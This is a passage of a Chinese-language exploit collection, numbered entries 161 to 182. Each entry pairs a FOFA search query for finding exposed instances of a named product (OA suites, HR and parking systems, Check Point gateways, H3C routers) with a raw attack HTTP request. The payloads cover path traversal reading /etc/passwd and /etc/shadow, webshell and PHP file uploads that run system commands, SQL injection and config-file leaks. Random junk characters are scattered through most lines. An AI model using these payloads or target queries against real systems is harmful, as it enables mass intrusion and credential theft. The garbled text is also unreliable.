FOFA:title="Nexus Repository Manager"$ b8 S$ v9 J# h% C6 @2 X4 V* u  Q
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
$ P! v( `  ]3 y# p* LHost: x.x.x.x
0 @* j+ r! Z" X9 D: s2 k' U- k5 eUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0$ |3 E6 J6 a! j/ A; W
Connection: close* ]4 p5 X) k3 i: ^
Accept: */*! b  j0 i; V6 i) t0 }. Q9 W
Accept-Language: en
6 A/ j8 d; t' w1 c7 T3 ]$ kAccept-Encoding: gzip; E5 ^  j7 K) ^4 T) t$ L( m" f  M

" @0 ^4 T; X# ^+ ~  s6 Q$ h8 k  B
/ y* `  t6 V% ]. h161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传5 Y+ F& `) ?: g2 T  J) ~& C/ J
FOFA:body="/KT_Css/qd_defaul.css"
( z" u8 V+ v. O0 n% u+ H5 r+ E4 N第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
' u) _1 e7 x2 t2 {7 B5 X7 _: {POST /Webservice.asmx HTTP/1.1
, F0 j: g  V' m0 T; ~$ b3 jHost: x.x.x.x
& T7 J1 p$ z4 }! W9 V8 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36  `0 C$ M) X& x. O
Connection: close
6 V) \6 A. V, U& E5 p4 a; x/ OContent-Length: 445
* j8 [# v8 V# LContent-Type: text/xml
7 P. U( E1 N7 B, B0 uAccept-Encoding: gzip
* F' d. w1 C& c( L( b, k& q% U( i
<?xml version="1.0" encoding="utf-8"?>
  q" M. a% A5 T5 S& d<soap:Envelope xmlns:xsi="
! b, R* x5 L( W/ Y$ k' ]http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema". p, K8 N& w, `. Y2 O9 ~$ l% H5 f& O
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
& Y4 m- `8 n; m. v; k<soap:Body>8 g' e9 g/ G3 z) V! g
<UploadResume xmlns="http://tempuri.org/">
8 n; Q+ p+ N. r! ~7 x$ J<ip>1</ip>
( N  l  Z) Y# V2 a0 e9 K9 e: o9 @<fileName>../../../../dizxdell.aspx</fileName>: ~* B/ a6 \2 m0 b0 u% k
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>7 ]4 F! u) n- h" e; W# |3 w
<tag>3</tag>5 G! m! N  t$ T  ~7 u
</UploadResume>
0 H4 j+ D7 n( c) e0 {0 T</soap:Body>
/ Y% u& [; M+ `' C! N" M</soap:Envelope>
/ `. V5 G1 }8 q* l( q9 @! B4 W6 W) J3 h1 b

1 v+ m& Z3 q3 W5 N( B; J/ ]http://x.x.x.x/dizxdell.aspx9 y8 }! X( N8 C
' [+ C% |2 W  J1 Y  }: @' K% K
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
/ \/ W# N( M9 W2 O  T0 v% d( ~- kFOFA: app="和丰山海-数字标牌"6 T; u, ~" q2 S8 B7 {. w
POST /QH.aspx HTTP/1.11 I4 N8 D$ ]6 U8 e9 f5 ~, L$ s. ~
Host: x.x.x.x
( Z6 a$ ~: r4 |! i, `3 }" WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0/ u; g2 ^1 t# ]# e9 g( _" {
Connection: close1 a! h+ ], Y$ ]& z! ]
Content-Length: 583+ U8 s6 I% m) ^( R  j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey3 d2 j( f$ L1 N6 U: D; t, Q
Accept-Encoding: gzip
9 w& _( p/ @# u4 \
' G! [5 z3 i; e' O0 E0 S3 w------WebKitFormBoundaryeegvclmyurlotuey
. k2 v3 u$ }! V5 l* B/ a7 @Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
% [9 v; i( C# _! |5 b# RContent-Type: application/octet-stream$ A7 x) X( h% N$ y5 P" r8 _
* f4 j% l7 C9 v0 {2 [- l1 w! t
<% response.write("ujidwqfuuqjalgkvrpqy") %>; A9 ~8 ], {; ]) O
------WebKitFormBoundaryeegvclmyurlotuey
$ O4 n9 M5 Q9 j8 fContent-Disposition: form-data; name="action"5 B2 L' w( f% c
2 S0 ~5 q) W! }( J% l8 U
upload
8 M+ o: X, V. [  S* c! Q' Z% w; c------WebKitFormBoundaryeegvclmyurlotuey% W( R7 B& Q. `4 `- H$ f! E
Content-Disposition: form-data; name="responderId"0 R$ s$ ~' {. o3 \8 f0 D& |  G
  d8 C; ?( ^" V1 N+ B, F( b
ResourceNewResponder
, c* x; ]: Y6 U$ _; v) A3 ^' g3 R------WebKitFormBoundaryeegvclmyurlotuey  l( B5 z% `# h$ Q1 L" _$ P& T$ U
Content-Disposition: form-data; name="remotePath"
% u  u! g$ w2 t) Y% G5 x3 S# i0 J+ F" X7 e
/opt/resources
# ^0 |% |# P" n  W3 k------WebKitFormBoundaryeegvclmyurlotuey--8 y: x8 D: r; v

8 i0 E6 }- f* Q, m( T' v; P  D2 k
0 Z* z/ e; P; _% `( j9 vhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
- U  u( {# _$ C) O# O9 L% M* o4 h/ z6 v9 g3 r- \
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传  k" |2 E" i$ R9 W/ k$ X
FOFA: icon_hash="-795291075"( g$ p/ j+ ]" f. R( h
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1. R6 y  n$ Q9 `+ a& ^
Host: x.x.x.x- Z) S4 c& A( E5 ~8 k% S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
- m; i/ ^+ o3 y/ s# h& XConnection: close0 T$ u5 [2 q: X& J0 m
Content-Length: 293
) u2 Z3 q; V4 L* l% p6 eAccept: */*
- K3 }& O& B) Z: U1 M6 VAccept-Encoding: gzip, deflate
! V2 A9 D% H" O3 G- r3 n! ?6 P# gAccept-Language: zh-CN,zh;q=0.9
6 u/ |7 Y% B7 ~1 j4 G8 s; nContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
1 h% ~4 J# Q- Z. ]* J9 u9 I$ T- Q* k; O9 D' H  Q6 r
------iiqvnofupvhdyrcoqyuujyetjvqgocod
+ l# k# P( `" F3 g  EContent-Disposition: form-data; name="name"( D( C& u5 Q" N3 W. c. L

. D% T4 {3 M( T" F0 n1.php( E( f" e" @: ]7 Q/ ^1 C8 `. G
------iiqvnofupvhdyrcoqyuujyetjvqgocod/ r4 q: ?. U/ I
Content-Disposition: form-data; name="upfile"; filename="1.php"
$ I/ c  G4 s! T* V4 Y$ GContent-Type: image/jpeg" q$ ]+ B$ \* B+ }+ B
/ X- z+ A2 n6 W  [. ~1 O3 @
rvjhvbhwwuooyiioxega
( S6 n) F. G, S2 H/ V------iiqvnofupvhdyrcoqyuujyetjvqgocod--' L4 ]/ {3 K& \# o

5 \9 c( j1 L9 o- }: o/ T' O% y% ?* c6 M2 Z7 ^* E
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传. H$ C. v/ V- ^; Q9 E6 }: ?0 Z. B
FOFA: title="智慧综合管理平台登入"
& \' p) n! E% \) u1 h5 lPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
  H7 b8 c+ F0 }# PHost: x.x.x.x+ l8 Z7 [3 d& `) J" V7 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
' h7 z0 J. N2 t0 Y3 }' _7 zContent-Length: 288
1 z% r: M5 s' Q) P" q7 eAccept: application/json, text/javascript, */*; q=0.01
- a+ ?7 \$ P/ L! n& P! _2 VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,9 [" {3 e* \% n( l  l
Connection: close5 A" }) i$ ?$ ^6 {/ y* Q1 \4 ~
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl2 F8 S. ~, k9 L6 Y9 m1 d' q
X-Requested-With: XMLHttpRequest! }& L% e0 u4 a; g- ~# Q( i* g& t
Accept-Encoding: gzip; {- u& K) K$ ^: W8 r* r* @$ Y9 P3 i
& X8 v/ K' ~5 ^3 r/ ^
------dqdaieopnozbkapjacdbdthlvtlyl
0 y# t# m5 V  |; `5 }: h' MContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
- H; e6 @* l( H9 v6 [" l5 u  jContent-Type: image/jpeg
* ?1 |" }$ E9 R2 J; g6 x) ]
2 V; Y0 b2 ~% V6 [<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
8 F) D: L9 g$ p: y, o0 H& r------dqdaieopnozbkapjacdbdthlvtlyl--
% ]: ?; c, _$ j
5 V' p* W: x! C- y: C8 o" j& ?& s* e6 d1 s2 ~0 H
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
7 M. Q( Z6 I5 x6 S' I* c5 k! H7 f( A0 }- u9 L
165. OrangeHRM 3.3.3 SQL 注入
& C+ Y3 c" f% v% O* yCVE-2024-364280 M- z/ h) E+ ^+ x4 `4 Q6 h6 {+ I4 t/ @3 K
FOFA: app="OrangeHRM-产品"2 F, \2 i; c  K/ ^8 r! n$ c
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
- x; w) L9 f  n  G* c3 L4 Z/ r* V
! K, ], K; a4 g; n- d$ r) U8 d5 {) B: k7 {
166. 中成科信票务管理平台SeatMapHandler SQL注入' D* I% W, w0 b; |- U2 O* b! R
FOFA:body="技术支持:北京中成科信科技发展有限公司"& A3 O( M# C- E  L5 Q
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.12 T! @- [& }- u3 [  M, q
Host:3 L; ^" N  s) R' O% C
Pragma: no-cache# F- h5 Q. ^; E6 {. K' q3 |
Cache-Control: no-cache1 G" c3 @8 I9 \; c  q# N" A; v
Upgrade-Insecure-Requests: 1
! W$ [$ p; I4 }7 [' FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36: _2 d7 T/ `' H# X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 W# P: B/ p6 r: _! u( p
Accept-Encoding: gzip, deflate
( V8 y$ B* ?% ~* P& WAccept-Language: zh-CN,zh;q=0.9,en;q=0.8: H' O2 M- {9 Z# y/ d3 T5 H8 b2 x
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE2 \/ i3 b' ~) K
Connection: close
) A8 w) z) O; `Content-Type: application/x-www-form-urlencoded
8 z# O3 }0 r5 sContent-Length: 89* p: N9 l. Q1 R
( s. b- }% p0 n- k. Q
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
9 I' J0 {8 h# D0 m$ k) ?- |
' S+ S' v! `6 R( B8 q; L+ Q9 ^8 R/ |6 I
167. 精益价值管理系统 DownLoad.aspx任意文件读取
, [1 S6 }! b% Y, K5 v* D3 j3 LFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
* L) v* J: w7 T/ |GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
0 \. b1 I: x* p" a* s, B, uHost:2 J6 h6 r8 q0 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 ]' a* @& L' u" {# Y5 t; EContent-Type: application/x-www-form-urlencoded! c1 |$ |% G) ~4 N/ q
Accept-Encoding: gzip, deflate6 Q5 {4 S; w7 i  V$ b! S
Accept: */*# B; G' @' }- @1 J
Connection: keep-alive& m7 `( v: k- h6 f- G' d
! J7 c0 K4 H1 s: j" u

- G) l- p. V0 L% q3 n. F2 @8 Z168. 宏景EHR OutputCode 任意文件读取
: H7 Z5 o/ p1 e1 U! y" e1 Q! a7 ?7 TFOFA:app="HJSOFT-HCM". {7 l7 n+ d2 N: V6 f4 P4 s% @
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
  `% S, t; T+ \" CHost: your-ip
- K$ N$ i. o$ _+ h/ z( tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36' n. U8 e/ h) Z+ d" ?
Content-Type: application/x-www-form-urlencoded' _2 H! l0 N- }6 s. t5 G2 X5 _
Connection: close& z5 p0 ^/ Y! s* q7 C0 e7 L
6 j. K0 m  v8 D: Q( K# X
0 ~9 P) Y4 z* f/ a

4 Q; U1 a" z! R169. 宏景EHR downlawbase SQL注入1 {  _) w# K$ E  a
FOFA:app="HJSOFT-HCM"
9 K2 R3 y9 _( R$ {6 O2 d+ P, e# OGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1( k& v2 S  U# \3 R4 l
Host: your-ip
9 \/ H  T2 Z- \8 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Q' y0 i. D! D* |Accept: */*$ P1 y) r3 M( ?+ X
Accept-Encoding: gzip, deflate4 n# V; f4 x  f/ C! I1 p6 [
Connection: close/ R6 n; t; r( L; {  z8 ?

1 u5 p/ J0 I/ }7 _
' v! `, d( R# J! n3 S2 D7 ]% O% z4 m' n8 N
170. 宏景EHR DisplayExcelCustomReport 任意文件读取) s1 ^; c: Q+ k- Y
FOFA:body="/general/sys/hjaxmanage.js"
, k9 o8 Y: m$ \& C1 i/ QPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1( J5 L% C7 _! A! K; Y% V
Host: balalanengliang1 `/ a, c% `/ t
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" ~7 I) q. L/ Q3 D0 u( q/ a+ aContent-Type: application/x-www-form-urlencoded7 J7 c8 f% i& W& ?* B7 T5 D& k

' B! ~; S; v/ Hfilename=../webapps/ROOT/WEB-INF/web.xml
& E, C8 ~9 ^- T  [0 ~8 M$ Q; z& L4 Q, B
7 h: `1 B" c9 R
171. 通天星CMSV6车载定位监控平台 SQL注入1 j+ O1 ?( w2 b( x1 }
FOFA:body="/808gps/"( C2 E8 [% g) b+ m( u: J) ]0 t3 j9 ^' Q
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.17 {. T2 n0 v% o6 I: ~6 l" [
Host: your-ip
; \1 A  _2 \" I1 w6 D+ cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
% X( i- F. N9 A- r& [Accept: */*/ s- w1 l+ A1 c0 l' U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: a2 z6 z' o( X6 c/ ?: U
Accept-Encoding: gzip, deflate
& c; [' Z/ \4 u* rConnection: close0 g* h8 N  C7 H( l" A( ~. a

- g4 U- B/ l  B- D/ b4 ?' s# Q0 v
/ L" g2 A( S) Z1 N
" a8 X' t9 g' M$ `172. DT-高清车牌识别摄像机任意文件读取
3 }% ]1 N, X3 ?( {7 D$ _1 sFOFA:app="DT-高清车牌识别摄像机"
$ W2 C5 Z' q& W) u$ z) MGET /../../../../etc/passwd HTTP/1.1
- c/ w1 @- F! eHost: your-ip8 B" g" i* `* e0 ^: R, B) d6 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 T0 e) {. C0 k. x0 k& A7 A9 [: k0 f
Accept-Encoding: gzip, deflate8 `7 }7 K. \* c4 e( z) j2 V. w
Accept: */*
" m: d$ I# R& W$ ~Connection: keep-alive9 j7 t0 ~8 d6 B" ?: V
. B" m* L0 d* {* {! M' E; S

5 R8 J2 D0 D: [$ N. }8 h2 s6 f3 B- S) Z
173. Check Point 安全网关任意文件读取
/ D- K/ J  l' V6 y: w" _CVE-2024-249191 o$ Q0 T  C6 j* o7 `9 o2 s3 w
FOFA:app="Check_Point-SSL-Network-Extender"
3 G/ T5 r$ |8 f. N+ y* CPOST /clients/MyCRL HTTP/1.1  N0 J( ~! [4 I
Host: your-ip
0 X8 Z$ o3 r  _9 ?Content-Type: application/x-www-form-urlencoded
' t6 U. J4 Q7 P9 y$ y9 B/ G9 E6 \& p9 n: C  B5 A- S
aCSHELL/../../../../../../../etc/shadow* `* I. x0 c7 I3 r/ p
1 L$ @* C' A, N: N; _

0 E1 \  B# _: @+ P  {7 X, r% T+ Q, ~9 R# m2 V* D- h: e4 {
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
5 R; [* j+ c8 y: `4 {: ]FOFA:app="金和网络-金和OA"
- I/ ^* a) f1 j  Y+ PGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1" d$ D( X! ]9 H! V$ T) |& C
Host: your-ip; |+ L- r- U+ q- f' d6 I. c: p8 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; O- l- I& b7 W# R% fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% W* {% e+ S0 v1 P9 U; b" r8 A0 Q2 @
Accept-Encoding: gzip, deflate, br
7 D' T5 r/ ]! [$ B: v; j8 OAccept-Language: zh-CN,zh;q=0.9
& c, n, m( b9 M4 ]Connection: close( F- b$ K: k4 c1 L7 h6 M6 h
  V# L: F/ C1 |$ ?8 F4 P6 ]

8 i" O) y, J) E: Q3 B1 r# F/ y& ~/ l7 Y( E9 i% U4 |
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
7 K) c) D- T2 HFOFA:app="金和网络-金和OA"
0 r1 G9 O: d) BGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
' P2 i$ p' \1 p1 BHost:* l% `4 z6 ^( j# v* N. Z- p! [
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, X) L! Z9 X, e' X' ?6 U$ M7 M; y  O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' U( J# ^8 F& Q' x+ w: Z8 ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- P6 T' e: i$ x9 N' |: S
Accept-Encoding: gzip, deflate( u0 r/ S7 C2 ~$ A5 |; u$ k0 h
Connection: close' W$ s* L* D+ n0 c. ~
Upgrade-Insecure-Requests: 1
& U/ H) T* I$ n
. ^- d5 n+ ?6 U, N- q4 x5 o" A, G- K
176. 电信网关配置管理系统 rewrite.php 文件上传
8 f1 S1 k  o, ~. y# QFOFA:body="img/login_bg3.png" && body="系统登录"
9 C3 H7 i" t! a/ N3 f9 |4 _' iPOST /manager/teletext/material/rewrite.php HTTP/1.16 V- @4 C3 |3 b! [0 V
Host: your-ip
  l: b- v, E& h  ?' cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' l% z4 j. N, c) X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
" O8 u! }: F2 u4 H6 G$ D" b8 uConnection: close
  L5 J# J) }' Z- k: j: \# @0 L! L, \4 Z6 Z- I0 d
------WebKitFormBoundaryOKldnDPT
/ G2 y$ k7 e7 `$ k) I5 GContent-Disposition: form-data; name="tmp_name"; filename="test.php": d8 a5 F& O6 A* \
Content-Type: image/png
! g- w; Y5 m; _, _7 s# Z& X( k# | & I4 u6 `: C* u4 N" e
<?php system("cat /etc/passwd");unlink(__FILE__);?>+ V1 K+ M/ B6 m" _( q( }( y
------WebKitFormBoundaryOKldnDPT+ p$ z2 x$ L$ @9 a2 C4 H
Content-Disposition: form-data; name="uploadtime"
: q1 f; f, R0 d: |; b: e $ U8 X: d4 Y/ m9 s
& l; U6 B$ B# P2 s; ^2 g2 J
------WebKitFormBoundaryOKldnDPT--
- c- N& z0 K( D4 J( @, d" ?
$ p+ R' P. z3 [$ t" D
& R" U* ?! a" n) _+ A' u
0 I: _0 t/ M: p) ?1 H% [+ V. R177. H3C路由器敏感信息泄露5 }5 D" x/ ]' P8 x2 K/ c% E
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
& y/ H3 ]7 E  a8 o% X1 @/userLogin.asp/../actionpolicy_status/../M60.cfg
/ L- @4 N/ q6 X( R/userLogin.asp/../actionpolicy_status/../GR8300.cfg7 K/ O6 \& h* b* g9 o  g1 ~
/userLogin.asp/../actionpolicy_status/../GR5200.cfg& [' ?0 A5 B" L7 P# J8 v
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
6 m+ D6 W1 x2 C/userLogin.asp/../actionpolicy_status/../GR2200.cfg
6 y, a0 ?8 k4 J( W9 A' \- Y0 ~/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
' z* D) L3 I% W2 `6 t2 w5 {/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg; O' R+ b' q& a# y
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg6 E4 e7 b* i/ ?: E7 }
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
5 X5 y; l1 `# W; ?; @8 P/userLogin.asp/../actionpolicy_status/../ER5200.cfg
* C5 _0 ^9 P; p; Z1 \! ?7 m# x6 b/userLogin.asp/../actionpolicy_status/../ER5100.cfg) U. e% M2 C1 _/ G' w' X, A1 f
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
; T5 h5 b4 B; ]# |1 C- P/userLogin.asp/../actionpolicy_status/../ER3260.cfg
2 O3 t* B/ N, o, `/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg4 f# r/ \+ G7 d5 x; y8 Z% l  z; _. |' n
/userLogin.asp/../actionpolicy_status/../ER3200.cfg; X/ X$ f/ X9 b6 j+ r" w
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
3 x3 D7 E  _5 I: e4 [1 M, s/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
- K: i0 k0 D: `/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
, M( L) j" t% `+ ^/userLogin.asp/../actionpolicy_status/../ER3100.cfg
& |& ]0 q# |  J& Y# ?/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
" z) W1 \/ S0 u7 r. j& M( _6 l
# ], G8 R( j0 {  M# g5 \/ A1 M0 v3 N9 |0 h% m
178. H3C校园网自助服务系统-flexfileupload-任意文件上传& M4 X( q& Z* j/ ?8 u
FOFA:header="/selfservice"4 C0 o* y9 A  _- ^
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
' x# O% a& L' P4 Y0 lHost:/ A' P+ N  _/ w% e, `. j7 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( r+ z/ z$ g6 G: iContent-Length: 252
3 C6 ?. O9 g4 N1 E5 W# M% ]- y$ yAccept-Encoding: gzip, deflate
5 G$ j! a0 S  w% y6 M5 j3 jConnection: close4 _; ^7 u% P. Z# s
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
8 G  A' R# i3 J7 X9 \/ y-----------------aqutkea7vvanpqy3rh2l
( q4 g1 _$ m" _9 D, I' q6 BContent-Disposition: form-data; name="12234.txt"; filename="12234"3 E( I9 f2 }& F. \8 d# P' Q
Content-Type: application/octet-stream9 q9 p/ g$ a  @% b) r
Content-Length: 255  }8 l% h6 f) D9 \8 ^% H

  W: s  e3 @' |& \3 n% @8 G5 [12234# s, d: f( U" c' a
-----------------aqutkea7vvanpqy3rh2l--5 q$ Q% ^# u% O; d

; ]) Y4 _. _# ~9 y8 m
4 {) _2 p7 z* _3 I% YGET /imc/primepush/%2e%2e/flex/12234.txt& o5 X& B" A* j$ C8 Z  {9 Q
" @7 D, B6 |% Q" k! ~9 }
6 E' q4 g$ P0 {2 \0 B7 }
179. 建文工程管理系统存在任意文件读取: l8 U! [' z( B% t. R
POST /Common/DownLoad2.aspx HTTP/1.1
7 z1 P+ Q/ v/ G% c% `Host: {{Hostname}}
  v7 O8 l5 |! _2 JContent-Type: application/x-www-form-urlencoded2 Y* t4 K0 g6 X& ^$ ~% s! w
User-Agent: Mozilla/5.0
  K# j$ e8 C! y" e; N" `/ y  U0 M0 {/ W  i
path=../log4net.config&Name=
2 D, }- B* D4 \7 ^" |2 r6 F1 N. G
2 o4 j2 a. Q4 L/ }! H& M9 d5 g/ o0 p, d1 {
180. 帮管客 CRM jiliyu SQL注入
* g5 N. T- a# ~FOFA:app="帮管客-CRM"
, D+ u) G) |- C, o* g0 F. OGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1$ n3 s9 C$ s4 s8 [: d
Host: your-ip
4 g! @! ]" k. [& I9 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: F0 {; K: [, }* UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% p5 l% a* ~4 J4 i- j/ F) AAccept-Encoding: gzip, deflate# |, w+ G/ b5 [; m
Accept-Language: zh-CN,zh;q=0.97 c: }5 N: V; r$ D3 P$ c
Connection: close
8 F" f# i+ d1 |" R1 f, W/ K6 N1 C* ?: G1 [& w

# h: {* `0 A7 S7 z9 C! z# U181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入: P8 c* b) f& I% e
FOFA:"PDCA/js/_publicCom.js"7 p; n* w* R2 B: U, K8 I5 N& h9 r9 j+ ?
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
$ `) S2 O6 P# E8 QHost: your-ip
- @* c( x8 V% N% v/ d; c  jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
% o( G4 p. d, r2 X+ j. sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 o( |6 G+ f2 ~, A1 e" g3 ]6 HAccept-Encoding: gzip, deflate, br: M1 h# x, w) H) ?' L# a
Accept-Language: zh-CN,zh;q=0.97 X5 y, v$ a) n
Connection: close' J* D8 p1 e3 t$ a2 F) }
Content-Type: application/x-www-form-urlencoded
! E  W  ?3 M# B# r9 u4 ~0 r  o/ h* _% K& q! }* Y
2 f( a+ Y/ [! j: n
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20& u9 m; o. L9 f7 w
9 @+ j+ S& n2 V4 j  o$ ^
' Z; H7 t7 o# Q3 {7 M9 @3 _
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
  {# X  W+ F5 c( W$ I- p* @FOFA:"PDCA/js/_publicCom.js"0 d# D: @0 J* i% M1 `' y- }
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1$ C! X2 |; v. x
Host: your-ip8 y5 y7 \( [8 {+ S( o- z, T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+ M3 p9 Q# N( M/ S# KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, D# T/ F7 Z+ _. x4 y8 C/ F
Accept-Encoding: gzip, deflate, br" q  G6 V" Q' A8 i& F% p9 O
Accept-Language: zh-CN,zh;q=0.9
$ [/ e- }" W) hConnection: close" Z* o9 _% \1 [' j3 m" q
Content-Type: application/x-www-form-urlencoded. I7 ^0 F2 k( o; d1 ~" `. k

